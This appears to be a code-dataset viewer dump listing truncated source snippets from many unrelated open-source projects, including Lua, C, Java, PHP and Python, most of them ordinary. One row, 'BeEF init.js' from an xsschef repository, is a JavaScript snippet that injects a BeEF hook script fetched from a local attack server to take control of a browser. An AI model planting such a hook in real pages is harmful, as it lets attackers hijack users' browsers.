code stringlengths 3 1.01M | repo_name stringlengths 5 116 | path stringlengths 3 311 | language stringclasses 30
values | license stringclasses 15
values | size int64 3 1.01M |
|---|---|---|---|---|---|
-----------------------------------
-- Area: Xarcabard (S)
-- NPC: Ruly Imp
-----------------------------------
require("scripts/globals/status");
-----------------------------------
-- onMobInitialize Action
-----------------------------------
function onMobInitialize(mob)
end;
------------------... | AlexandreCA/update | scripts/zones/Xarcabard_[S]/mobs/Ruly_Imp.lua | Lua | gpl-3.0 | 991 |
/*
* Copyright (c) 2002-2007 Apple Inc. All rights reserved.
*
* @APPLE_OSREFERENCE_LICENSE_HEADER_START@
*
* This file contains Original Code and/or Modifications of Original Code
* as defined in and that are subject to the Apple Public Source License
* Version 2.0 (the 'License'). You may not use this file ex... | LubosD/darling | kernel-include/machine/ucontext.h | C | gpl-3.0 | 1,543 |
/*
* Copyright (c) 2009, The MilkyTracker Team.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* - Redistributions of source code must retain the above copyright notice,
* this list o... | echolevel/MilkySyphus-cocoa | src/milkyplay/drivers/sdl/AudioDriver_SDL.h | C | gpl-3.0 | 2,472 |
// Copyright 2014 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
// Needed on Windows to get |M_PI| from <cmath>.
#ifdef _WIN32
#define _USE_MATH_DEFINES
#endif
#include <stddef.h>
#include <cmath>
#include "content/... | geminy/aidear | oss/qt/qt-everywhere-opensource-src-5.9.0/qtwebengine/src/3rdparty/chromium/content/browser/renderer_host/input/web_input_event_util_unittest.cc | C++ | gpl-3.0 | 5,108 |
/*
===========================================================================
Copyright (C) 1999-2010 id Software LLC, a ZeniMax Media company.
This file is part of Spearmint Source Code.
Spearmint Source Code is free software; you can redistribute it
and/or modify it under the terms of the GNU General Public Licens... | mecwerks/spearmint-ios | code/client/cl_scrn.c | C | gpl-3.0 | 5,447 |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>Loads a font</title>
</head>
<body><div class="manualnavbar" style="text-align: center;">
<div class="prev" style="text... | rafaelgou/the-phpjs-local-docs-collection | php/5.5/function.ps-findfont.html | HTML | gpl-3.0 | 6,774 |
/*
* input.h
*
* Created on: 20/apr/2015
* Author: ibanez89
*/
#ifndef INPUT_H_
#define INPUT_H_
void lettura_numero(unsigned int *numeroPtr);
#endif /* INPUT_H_ */
| LucianoFaretra/Workspace | [Programmazione in C 2014]/Esercitazione4-Game-of-Life_Cunit/input.h | C | gpl-3.0 | 179 |
// TP OpenGL: Joerg Liebelt, Serigne Sow
//on ajoute des arbres
#ifndef __TREEBOX_H__
#define __TREEBOX_H__
#include "quadtree.h"
class TREE
{
private:
QImage texture;
GLuint texID;
bool iwanttrees;
float treeSizeFactor;
int numTrees;
qglviewer::Vec* treeInfo;
//ici, je casse la beaute de mon architectu... | kerautret/libQGLViewer | examples/contribs/terrain/tree.h | C | gpl-3.0 | 849 |
/*
* Generated by asn1c-0.9.24 (http://lionet.info/asn1c)
* From ASN.1 module "InformationElements"
* found in "../asn/InformationElements.asn"
* `asn1c -fcompound-names -fnative-types`
*/
#include "UL-TS-ChannelisationCodeList-VHCR.h"
static asn_per_constraints_t asn_PER_type_UL_TS_ChannelisationCodeList_VHCR... | BramBonne/snoopsnitch-pcapinterface | contrib/libosmo-asn1-rrc/src/UL-TS-ChannelisationCodeList-VHCR.c | C | gpl-3.0 | 2,112 |
##############################################################################
# Build global options
# NOTE: Can be overridden externally.
#
# Compiler options here.
ifeq ($(USE_OPT),)
USE_OPT = -O2 -ggdb -fomit-frame-pointer -falign-functions=16
endif
# C specific options here (added to USE_OPT).
ifeq ($(USE_COPT... | JustRob83/virulent | demos/ARMCM3-STM32F103ZG-FATFS/Makefile | Makefile | gpl-3.0 | 5,693 |
<?php
$moduleName = 'employees';
define('MODULE_PATH',dirname(__FILE__));
include APP_BASE_PATH.'header.php';
include APP_BASE_PATH.'modulejslibs.inc.php';
?><div class="span9">
<ul class="nav nav-tabs" id="modTab" style="margin-bottom:0px;margin-left:5px;border-bottom: none;">
<li class="active"><a id="tabE... | rhnvrm/icehrm | ext/admin/employees/index.php | PHP | gpl-3.0 | 956 |
#ifndef SCHED_AFFINITY_WIN32_WRAPPER_H
#define SCHED_AFFINITY_WIN32_WRAPPER_H
typedef __int64 cpu_set_t;
typedef HANDLE pid_t;
static inline int CPU_ISSET(__int64 cpu, cpu_set_t *set)
{
return((*set & ((__int64) 1 << cpu)) ? 1 : 0);
}
static inline int sched_setaffinity(pid_t pid, unsigned int cpusetsize... | ddemidov/caldgemm | cmodules/sched_affinity_win32_wrapper.h | C | gpl-3.0 | 736 |
#include "stdafx.h"
#include "RFXBase.h"
#include "../main/mainworker.h"
#include "../main/Helper.h"
#include "../main/Logger.h"
#include "../main/RFXtrx.h"
CRFXBase::CRFXBase()
{
m_NoiseLevel = 0;
m_AsyncType = ATYPE_DISABLED;
}
CRFXBase::~CRFXBase()
{
}
bool CRFXBase::onInternalMessage(const unsigned char *pBuff... | DebugBill/domoticz | hardware/RFXBase.cpp | C++ | gpl-3.0 | 7,846 |
/* mc_dram.c - Memory Controller testbench dram test
Copyright (C) 2001 Ivan Guzvinec
Copyright (C) 2010 Embecosm Limited
Contributor Ivan Guzvinec <ivang@opencores.org>
Contributor Jeremy Bennett <jeremy.bennett@embecosm.com>
This file is part of OpenRISC 1000 Architectural Simulator.
This pro... | 8l/or1ksim | testsuite/test-code-or1k/mc-dram/mc-dram.c | C | gpl-3.0 | 12,404 |
/*
* Copyright (C) 2014-2015 CS-SI (foss-contact@thor.si.c-s.fr)
* Copyright (C) 2013-2015 Brockmann Consult GmbH (info@brockmann-consult.de)
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the Free
* Software Foundat... | obarrilero/s2tbx | s2tbx-s2msi-reader/src/main/java/org/esa/s2tbx/dataio/s2/ortho/plugins/Sentinel2L1CProduct_Multi_UTM17N_ReaderPlugIn.java | Java | gpl-3.0 | 1,151 |
/*
* Copyright (C) 2009 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by app... | s20121035/rk3288_android5.1_repo | packages/apps/Email/tests/src/com/android/email/provider/ProviderTestUtils.java | Java | gpl-3.0 | 19,617 |
(function() {
var d=document;
var s = d.createElement('script');
s.src = 'http://127.0.0.1:3000/hook.js'; // BeEF hook here
s.setAttribute('onload','beef_init();');
d.body.appendChild(s);
})();
| koto/xsschef | snippets/eval-snippets/BeEF init.js | JavaScript | gpl-3.0 | 194 |
/*
* This file is part of the LibreOffice project.
*
* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/.
*
* This file incorporates work covered by the following lice... | beppec56/core | qadevOOo/runner/share/LogWriter.java | Java | gpl-3.0 | 1,567 |
/*
* Generated by asn1c-0.9.24 (http://lionet.info/asn1c)
* From ASN.1 module "InformationElements"
* found in "../asn/InformationElements.asn"
* `asn1c -fcompound-names -fnative-types`
*/
#ifndef _PDCP_Info_H_
#define _PDCP_Info_H_
#include <asn_application.h>
/* Including external dependencies */
#include ... | BramBonne/snoopsnitch-pcapinterface | contrib/libosmo-asn1-rrc/include/PDCP-Info.h | C | gpl-3.0 | 1,099 |
import boto,sys,euca_admin
from boto.exception import EC2ResponseError
from euca_admin.generic import BooleanResponse
from euca_admin.generic import StringList
from boto.resultset import ResultSet
from euca_admin import EucaAdmin
from optparse import OptionParser
SERVICE_PATH = '/services/Accounts'
class Group():
... | Shebella/HIPPO | clc/tools/src/euca_admin/groups.py | Python | gpl-3.0 | 2,776 |
class Web::ApplicationController < ActionController::Base
protect_from_forgery with: :exception
private
# rubocop:disable all
def after_sign_in_path_for(resource)
session['user_return_to'] || in_progress_courses_url
end
end
| Rosalila/Kusukin | app/controllers/web/application_controller.rb | Ruby | gpl-3.0 | 240 |
/*
* Copyright (C) 2015 Arthur Gregorio, AG.Software
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This ... | brunofarina/web-budget | webBudget/src/main/java/br/com/webbudget/infraestructure/config/SecurityConfiguration.java | Java | gpl-3.0 | 6,806 |
#!/usr/bin/env python
# vim:fileencoding=utf-8
from __future__ import (unicode_literals, division, absolute_import,
print_function)
__license__ = 'GPL v3'
__copyright__ = '2014, Kovid Goyal <kovid at kovidgoyal.net>'
from tinycss.css21 import CSS21Parser
from tinycss.parsing import remove_whit... | nozuono/calibre-webserver | src/tinycss/media3.py | Python | gpl-3.0 | 4,645 |
/*
* MenuActivity.java
*
* This file is part of ARcowabungaproject.
*
* Bernabe Gonzalez Garcia <bernagonzga@gmail.com>
* Joaquim Dalmau Torva <jdalmaut@gmail.com>
* Marc Sabate Piñol <masapim@hotmail.com>
* Victor Purcallas Marchesi <vpurcallas@gmail.com>
*
* This activity displays to the user a... | bernagg/arcowabungaproject | ARcowabungaproject/src/org/escoladeltreball/arcowabungaproject/activities/MenuActivity.java | Java | gpl-3.0 | 15,686 |
<?php
/**
* Belgian Police Web Platform - Districts Component
*
* @copyright Copyright (C) 2012 - 2013 Timble CVBA. (http://www.timble.net)
* @license GNU GPLv3 <http://www.gnu.org/licenses/gpl.html>
* @link https://github.com/belgianpolice/internet-platform
*/
namespace Nooku\Component\Districts;
use Nooku\Li... | jowillems/internet-platform | component/districts/model/districts.php | PHP | gpl-3.0 | 1,026 |
from south.db import db
from django.db import models
from transifex.releases.models import *
class Migration:
def forwards(self, orm):
"Write your forwards migration here"
def backwards(self, orm):
"Write your backwards migration here"
models = {
}
complete_apps = ['releases... | tymofij/adofex | transifex/releases/migrations/0001_initial.py | Python | gpl-3.0 | 323 |
<?php
// This file is part of Moodle - http://moodle.org/
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle ... | damyon/atto_27 | lib/classes/event/group_updated.php | PHP | gpl-3.0 | 2,425 |
#
# Software Lab for Advanced Machine Learning with Stochastic Algorithms
# Copyright (c) 2015 Vilen Jumutc, KU Leuven, ESAT-STADIUS
# License & help @ https://github.com/jumutc/SALSA.jl
# Documentation @ http://salsajl.readthedocs.org
#
# This program is free software; you can redistribute it and/or modify
# it unde... | droidicus/SALSA.jl | src/support/constants.jl | Julia | gpl-3.0 | 1,102 |
# Copyright (c) 2019, Frappe Technologies Pvt. Ltd. and contributors
# For license information, please see license.txt
# import frappe
from frappe.model.document import Document
class QualityReviewObjective(Document):
pass
| frappe/erpnext | erpnext/quality_management/doctype/quality_review_objective/quality_review_objective.py | Python | gpl-3.0 | 228 |
/*******************************************************************************
Copyright (C) The University of Auckland
OpenCOR is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, ... | agarny/opencor | src/plugins/solver/ForwardEulerSolver/src/forwardeulersolver.h | C | gpl-3.0 | 2,323 |
/*
This file is part of Telegram Desktop,
the official desktop version of Telegram messaging app, see https://telegram.org
Telegram Desktop is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the ... | patrick246/tdesktop | Telegram/SourceFiles/window/slide_animation.h | C | gpl-3.0 | 1,837 |
/*!
* Name : steelseries.js
* Authors : Gerrit Grunwald, Mark Crossley
* Last modified : 31.03.2015
* Revision : 0.14.15
*
* Copyright (c) 2011, Gerrit Grunwald, Mark Crossley
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without modification, are pe... | cimenx/PASSION | www/js/vendor/steelseries.js | JavaScript | gpl-3.0 | 708,180 |
/*
* Copyright (c) 2014, Shogun Toolbox Foundation
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
* 1. Redistributions of source code must retain the above copyright notice,
* this lis... | rcurtin/shogun | src/shogun/neuralnets/RBM.h | C | gpl-3.0 | 16,922 |
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
def forwards(self, orm):
# Deleting field id
db.delete_column('layers_layer', 'id')
# set new primary key for layers_layer
db.cr... | GISPPU/GrenadaLandInformation | geonode/layers/migrations/0010_remove_unneeded_objects.py | Python | gpl-3.0 | 20,864 |
from nose.tools import eq_, with_setup
from threading import Thread
from Queue import Queue
from time import sleep
def setup():
global Person, neo4django, gdb, neo4jrestclient, neo_constants, settings, models
from neo4django.tests import Person, neo4django, gdb, neo4jrestclient, \
neo_constants, ... | coffenbacher/neo4django | neo4django/tests/synchronicity_tests.py | Python | gpl-3.0 | 2,374 |
/**
******************************************************************************
* @file stm32l4xx_hal_rcc_ex.h
* @author MCD Application Team
* @version V1.5.1
* @date 31-May-2016
* @brief Header file of RCC HAL Extended module.
**********************************************************... | wilberforce/Espruino | targetlibs/stm32l4/lib/STM32L4xx_HAL_Driver/Inc/stm32l4xx_hal_rcc_ex.h | C | mpl-2.0 | 103,701 |
<!DOCTYPE HTML>
<html>
<!--
https://bugzilla.mozilla.org/show_bug.cgi?id=585819
-->
<head>
<title>Test for Bug 585819</title>
<script type="text/javascript" src="/MochiKit/MochiKit.js"></script>
<script type="text/javascript" src="/tests/SimpleTest/SimpleTest.js"></script>
<link rel="stylesheet" type="text/css"... | Yukarumya/Yukarum-Redfoxes | dom/tests/mochitest/bugs/test_bug585819.html | HTML | mpl-2.0 | 1,168 |
//
// Copyright 2016, AdColony, Inc.
//
#import <GoogleMobileAds/GoogleMobileAds.h>
@interface GADMAdapterAdColonyExtras : NSObject<GADAdNetworkExtras>
/// Optional custom identifier for the current user for rewarded video, this will be used within
/// server authoritative rewards.
/// This must be 128 characters or... | ludei/atomic-plugins-ads | src/cordova/ios/admob/adcolony/libs/AdColonyAdapter.framework/Versions/Current/Headers/GADMAdapterAdColonyExtras.h | C | mpl-2.0 | 931 |
/*
* This file is part of Espruino, a JavaScript interpreter for Microcontrollers
*
* Copyright (C) 2013 Gordon Williams <gw@pur3.co.uk>
*
* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http... | dptechnics/Espruino | libs/graphics/jswrap_graphics.c | C | mpl-2.0 | 31,197 |
---
name: 'ACL Replication for Multiple Datacenters'
content_length: 15
id: acl-replication
layout: content_layout
products_used:
- Consul
description: Configure tokens, policies, and roles to work across multiple datacenters.
---
You can configure tokens, policies and roles to work across multiple datacenters. ACL ... | 42wim/consul | website/source/docs/guides/acl-replication.md | Markdown | mpl-2.0 | 7,707 |
/* Any copyright is dedicated to the Public Domain.
http://creativecommons.org/publicdomain/zero/1.0/ */
package org.mozilla.gecko.background.sync.helpers;
import static junit.framework.Assert.assertEquals;
import java.util.HashSet;
import java.util.Set;
import junit.framework.AssertionFailedError;
public class... | jrconlin/mc_backup | tests/background/junit3/src/sync/helpers/ExpectNoGUIDsSinceDelegate.java | Java | mpl-2.0 | 834 |
namespace MiNET.Blocks
{
public class Lever : Block
{
public Lever() : base(69)
{
IsTransparent = true;
IsSolid = false;
BlastResistance = 2.5f;
Hardness = 0.5f;
}
}
} | MiPE-JP/RaNET | src/MiNET/MiNET/Blocks/Lever.cs | C# | mpl-2.0 | 191 |
---
subcategory: "Compute Engine"
layout: "google"
page_title: "Google: google_compute_region_ssl_certificate"
sidebar_current: "docs-google-datasource-compute-region-ssl-certificate"
description: |-
Get info about a Regional Google Compute SSL Certificate.
---
# google\_compute\_region\_ssl\_certificate
Get info a... | hashicorp/terraform-provider-google-beta | website/docs/d/compute_region_ssl_certificate.html.markdown | Markdown | mpl-2.0 | 1,363 |
/*-*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */
/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
#ifndef nsISO88598IToUnicode_h___
#... | Yukarumya/Yukarum-Redfoxes | intl/uconv/ucvlatin/nsISO88598IToUnicode.h | C | mpl-2.0 | 679 |
package version
func init() {
// The main version number that is being run at the moment.
Version = "0.10.3"
// A pre-release marker for the version. If this is "" (empty string)
// then it means that it is a final release. Otherwise, this is a pre-release
// such as "dev" (in development), "beta", "rc1", etc.
... | youhong316/consul | vendor/github.com/hashicorp/vault/version/version_base.go | GO | mpl-2.0 | 345 |
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Steeplechase harness</title>
<script src="harness.js"></script>
</head>
<body>
</body>
</html>
| mozilla/steeplechase | webharness/index.html | HTML | mpl-2.0 | 155 |
/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */
/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
#ifndef nsWindowMap_h_
#define nsW... | Yukarumya/Yukarum-Redfoxes | widget/cocoa/nsWindowMap.h | C | mpl-2.0 | 1,874 |
{# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/. -#}
{% add_lang_files "firefox/developer" %}
{% extends "/firefox/base-resp.html" %}
{% block gtm_page_id %}data-gt... | glogiotatidis/bedrock | bedrock/firefox/templates/firefox/dev-firstrun.html | HTML | mpl-2.0 | 14,620 |
/*
* Copyright (C) 2007 Tommi Maekitalo
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License as
* published by the Free Software Foundation; either version 2 of the
* License, or (at your option) any later version.
*
* This program is di... | carmenfdezb/Zimpedia | sailfish/libs/zimlib/include/zim/zintstream.h | C | mpl-2.0 | 3,493 |
#ifndef CRYPTOPP_OSRNG_H
#define CRYPTOPP_OSRNG_H
//! \file
#include "config.h"
#ifdef OS_RNG_AVAILABLE
#include "randpool.h"
#include "rng.h"
#include "aes.h"
#include "sha.h"
#include "fips140.h"
NAMESPACE_BEGIN(CryptoPP)
//! Exception class for Operating-System Random Number Generator.
class... | michaelforfxhelp/master | third_party/cryptopp/osrng.h | C | mpl-2.0 | 4,657 |
<?php
require_once('include/MVC/View/views/view.list.php');
require_once('modules/Cases/CasesListViewSmarty.php');
class CasesViewList extends ViewList {
function __construct(){
parent::__construct();
}
/**
* @deprecated deprecated since version 7.6, PHP4 Style Constructors are deprecated and will be r... | noelhunter/SuiteCRM | modules/Cases/views/view.list.php | PHP | agpl-3.0 | 849 |
# coding=utf-8
__author__ = "Gina Häußge <osd@foosel.net>"
__license__ = 'GNU Affero General Public License http://www.gnu.org/licenses/agpl.html'
from flask import request, jsonify, make_response
import re
from octoprint.settings import settings, valid_boolean_trues
from octoprint.server import printer, restricted_a... | C-o-r-E/OctoPrint | src/octoprint/server/api/printer.py | Python | agpl-3.0 | 9,354 |
#!/usr/bin/python
#
# \file 0_setup.py
# \brief Setup rbank
# \date 2009-03-10-22-43-GMT
# \author Jan Boon (Kaetemi)
# Python port of game data build pipeline.
# Setup rbank
#
# NeL - MMORPG Framework <http://dev.ryzom.com/projects/nel/>
# Copyright (C) 2010 Winch Gate Property Limited
#
# This program is free soft... | osgcc/ryzom | nel/tools/build_gamedata/processes/rbank/0_setup.py | Python | agpl-3.0 | 2,998 |
#
# Copyright (C) 2014 Instructure, Inc.
#
# This file is part of Canvas.
#
# Canvas is free software: you can redistribute it and/or modify it under
# the terms of the GNU Affero General Public License as published by the Free
# Software Foundation, version 3 of the License.
#
# Canvas is distributed in the hope that ... | arrivu/hoodemo | gems/lti_outbound/spec/lti_outbound/lti_course_spec.rb | Ruby | agpl-3.0 | 1,016 |
<?php
/*********************************************************************************
* TimeTrex is a Payroll and Time Management program developed by
* TimeTrex Software Inc. Copyright (C) 2003 - 2014 TimeTrex Software Inc.
*
* This program is free software; you can redistribute it and/or modify it under
* the... | maestrano/timetrex | classes/modules/users/UserDeductionListFactory.class.php | PHP | agpl-3.0 | 14,005 |
package com.nordicpeak.flowengine.enums;
public enum ContentType {
NEW,
WAITING_FOR_MULTISIGN,
WAITING_FOR_PAYMENT,
SUBMITTED,
WAITING_FOR_COMPLETION,
IN_PROGRESS,
ARCHIVED
}
| christer155/Open-ePlatform | FlowEngine/src/com/nordicpeak/flowengine/enums/ContentType.java | Java | agpl-3.0 | 201 |
<?php
/**
* This file is part of the Checkbook NYC financial transparency software.
*
* Copyright (C) 2012, 2013 New York City
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU Affero General Public License as
* published by the Free Software Foundation, either v... | MomixSolutions/MyGovCenter | source/webapp/sites/all/modules/dashboard_platform/join_controller/controller/handler/UnionJoinController.php | PHP | agpl-3.0 | 1,672 |
<?php
/*********************************************************************************
* Zurmo is a customer relationship management program developed by
* Zurmo, Inc. Copyright (C) 2014 Zurmo Inc.
*
* Zurmo is free software; you can redistribute it and/or modify it under
* the terms of t... | speixoto/zurmo-for-school | app/protected/modules/home/messages/it/Default.php | PHP | agpl-3.0 | 4,628 |
#
# Copyright (C) 2011 - 2013 Instructure, Inc.
#
# This file is part of Canvas.
#
# Canvas is free software: you can redistribute it and/or modify it under
# the terms of the GNU Affero General Public License as published by the Free
# Software Foundation, version 3 of the License.
#
# Canvas is distributed in the hop... | muthhus/canvas-lms | app/models/group_category.rb | Ruby | agpl-3.0 | 6,047 |
# This file is part of Navitia,
# the software to build cool stuff with public transport.
#
# Hope you'll enjoy and contribute to this project,
# powered by Canal TP (www.canaltp.fr).
# Help us simplify mobility and open public transport:
# a non ending quest to the responsive locomotion way of traveling!
#... | xlqian/navitia | source/jormungandr/jormungandr/interfaces/v1/decorators.py | Python | agpl-3.0 | 1,461 |
<?php
/* vim: set expandtab tabstop=4 shiftwidth=4 softtabstop=4: */
/**
* This file is part of Onlogistics, a web based ERP and supply chain
* management application.
*
* Copyright (C) 2003-2008 ATEOR
*
* This program is free software: you can redistribute it and/or modify it
* under the terms of the GNU A... | danilo-cesar/onlogistics | lib/CustomGrid/Columns/GridColumnACHProductRefAndQty.php | PHP | agpl-3.0 | 2,153 |
/*
* ProActive Parallel Suite(TM):
* The Open Source library for parallel and distributed
* Workflows & Scheduling, Orchestration, Cloud Automation
* and Big Data Analysis on Enterprise Grids & Clouds.
*
* Copyright (c) 2007 - 2017 ActiveEon
* Contact: contact@activeeon.com
*
* This library is free software: y... | mbenguig/scheduling | scheduler/scheduler-server/src/test/java/functionaltests/utils/SchedulerStartForFunctionalTest.java | Java | agpl-3.0 | 7,242 |
<!--
/*********************************************************************************
* SugarCRM is a customer relationship management program developed by
* SugarCRM, Inc. Copyright (C) 2004-2011 SugarCRM Inc.
*
* This program is free software; you can redistribute it and/or modify it under
* the terms of the ... | matthewpoer/SuperSweetAdmin | modules/Opportunities/SubPanelView.html | HTML | agpl-3.0 | 3,658 |
#
# Copyright (C) 2016 Instructure, Inc.
#
# This file is part of Canvas.
#
# Canvas is free software: you can redistribute it and/or modify it under
# the terms of the GNU Affero General Public License as published by the Free
# Software Foundation, version 3 of the License.
#
# Canvas is distributed in the hope that ... | matematikk-mooc/canvas-lms | spec/selenium/discussions/discussion_helpers.rb | Ruby | agpl-3.0 | 4,717 |
#!/usr/bin/env python
from django.core.management import call_command
from django.core.management.base import BaseCommand
class Command(BaseCommand):
def handle(self, *args, **options):
call_command(
'dumpdata',
"waffle.flag",
indent=4,
use_natural_foreign_k... | uclouvain/OSIS-Louvain | base/management/commands/dump_waffle_flags.py | Python | agpl-3.0 | 436 |
// FastNoiseSIMD_internal.cpp
//
// MIT License
//
// Copyright(c) 2017 Jordan Peck
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files(the "Software"), to deal
// in the Software without restriction, including without limitation the ... | nrz/ylikuutio | external/FastNoiseSIMD/FastNoiseSIMD/FastNoiseSIMD_internal.cpp | C++ | agpl-3.0 | 81,350 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
##
# ipy.py: Interaction with IPython and Jupyter.
##
# © 2016 Chris Ferrie (csferrie@gmail.com) and
# Christopher E. Granade (cgranade@gmail.com)
#
# This file is a part of the Qinfer project.
# Licensed under the AGPL version 3.
##
# This program is free software:... | MichalKononenko/python-qinfer | src/qinfer/ipy.py | Python | agpl-3.0 | 3,141 |
package rocks.inspectit.shared.cs.cmr.property.configuration;
import static org.hamcrest.MatcherAssert.assertThat;
import static org.hamcrest.Matchers.hasEntry;
import static org.hamcrest.Matchers.hasKey;
import static org.hamcrest.Matchers.not;
import static org.mockito.Mockito.when;
import java.util.Map;
import or... | inspectIT/inspectIT | inspectit.shared.cs/src/test/java/rocks/inspectit/shared/cs/cmr/property/configuration/ConfigurationTest.java | Java | agpl-3.0 | 1,609 |
package rocks.inspectit.agent.java.sdk.opentracing.internal.noop;
import java.util.Collections;
import java.util.Map.Entry;
import io.opentracing.NoopSpanContext;
import io.opentracing.NoopTracer;
import io.opentracing.NoopTracerFactory;
import io.opentracing.SpanContext;
import io.opentracing.propagation.Format;
imp... | inspectIT/inspectIT | inspectit.agent.java.sdk/src/main/java/rocks/inspectit/agent/java/sdk/opentracing/internal/noop/NoopExtendedTracerImpl.java | Java | agpl-3.0 | 2,621 |
<?php
return array(
'does_not_exist' => 'Staðsetningin er ekki til.',
'assoc_users' => 'This location is currently associated with at least one user and cannot be deleted. Please update your users to no longer reference this location and try again. ',
'assoc_assets' => 'This location is currently associ... | mtucker6784/snipe-it | resources/lang/is/admin/locations/message.php | PHP | agpl-3.0 | 1,217 |
<?php
/* vim: set expandtab tabstop=4 shiftwidth=4 softtabstop=4: */
/**
* This file is part of Onlogistics, a web based ERP and supply chain
* management application.
*
* Copyright (C) 2003-2008 ATEOR
*
* This program is free software: you can redistribute it and/or modify it
* under the terms of the GNU A... | contactkarthikc/onlogistics | lib/Objects/AeroOperator.php | PHP | agpl-3.0 | 5,119 |
/*
* iReport - Visual Designer for JasperReports.
* Copyright (C) 2002 - 2009 Jaspersoft Corporation. All rights reserved.
* http://www.jaspersoft.com
*
* Unless you have purchased a commercial license agreement from Jaspersoft,
* the following license terms apply:
*
* This program is part of iReport.
*
* iRe... | klebergraciasoares/ireport-fork | ireport-designer/src/com/jaspersoft/ireport/designer/sheet/properties/charts/ScatterRangeAxisMaxValueExpressionProperty.java | Java | agpl-3.0 | 2,582 |
#!/bin/bash
mkdir -p exports
getexport () {
COURSE=$1
OUTFILE=exports/$1_`date "+%Y-%m-%dT%H:%M:%S"`.csv
URL="https://prairielearn.engr.illinois.edu:/backend/$COURSE/export.csv"
HEADERS=`node print_signature.js --headers mwest@illinois.edu "Matthew West" ~/git/ansible-pl/config-$COURSE-backend.json`
... | lotrfan/PrairieLearn | v1/backend/export_commands.sh | Shell | agpl-3.0 | 465 |
# -*- encoding: utf-8 -*-
###############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013 Savoir-faire Linux (<http://www.savoirfairelinux.com>).
#
# This program is free software: you can redistribute it and/or modify
# it un... | bwrsandman/openerp-hr | hr_language/hr_language.py | Python | agpl-3.0 | 1,839 |
#if !DISABLE_DHT
//
// FindNode.cs
//
// Authors:
// Alan McGovern <alan.mcgovern@gmail.com>
//
// Copyright (C) 2008 Alan McGovern
//
// Permission is hereby granted, free of charge, to any person obtaining
// a copy of this software and associated documentation files (the
// "Software"), to deal in the Software wit... | senditu/simpletorrent | monotorrent/src/MonoTorrent.Dht/Messages/Queries/FindNode.cs | C# | agpl-3.0 | 2,719 |
<?php
/**
* Class following Singleton pattern for specific extension configuration
*
* @author Jan-Derek (CiviCooP) <j.vos@bosqom.nl>
*/
class CRM_Lidmaatschapwijziging_ConfigRelationship {
/*
* singleton pattern
*/
static private $_singleton = NULL;
// Contact
protected $contact_i... | jvos/nl.vnv.lidmaatschapwijziging_old | CRM/Lidmaatschapwijziging/ConfigRelationship.php | PHP | agpl-3.0 | 12,092 |
/**
* Copyright (C) 2001-2015 by RapidMiner and the contributors
*
* Complete list of developers available at our web site:
*
* http://rapidminer.com
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU Affero General Public License as published b... | brtonnies/rapidminer-studio | src/main/java/com/rapidminer/operator/visualization/ROCChartGenerator.java | Java | agpl-3.0 | 6,797 |
<?php
/**
* This a simple example lint engine which just applies the
* @{class:ArcanistPyLintLinter} to any Python files. For a more complex
* example, see @{class:PhutilLintEngine}.
*
* @group linter
*/
final class InboxServerLintEngine extends ArcanistLintEngine {
public function buildLinters() {
// Th... | nylas/sync-engine | arclib/src/InboxServerLintEngine.php | PHP | agpl-3.0 | 2,579 |
/**
* Require frontend modules.
*
* Note: Do not use to require backend modules, as they should be CommonJS
* modules and not AMD modules.
*/
var ERR = require('async-stacktrace');
var _ = require('lodash');
var async = require('async');
var requirejs = require('requirejs');
var logger = require('./logger');
req... | parasgithub/PrairieLearn | lib/require-frontend.js | JavaScript | agpl-3.0 | 1,566 |
<?php
require_once('custom/include/utils/DevToolKit.php');
class DynamicPanel extends DevToolKit {
public function __construct(&$view) {
$this->metadata_name = 'toggle_panel_fields';
$this->event_function = 'togglePanel';
parent::__construct($view);
}
public function display() {
parent::display();
}
pro... | ExpandeNegocio/crm | custom/include/utils/DevToolKit/DynamicPanel.php | PHP | agpl-3.0 | 2,591 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
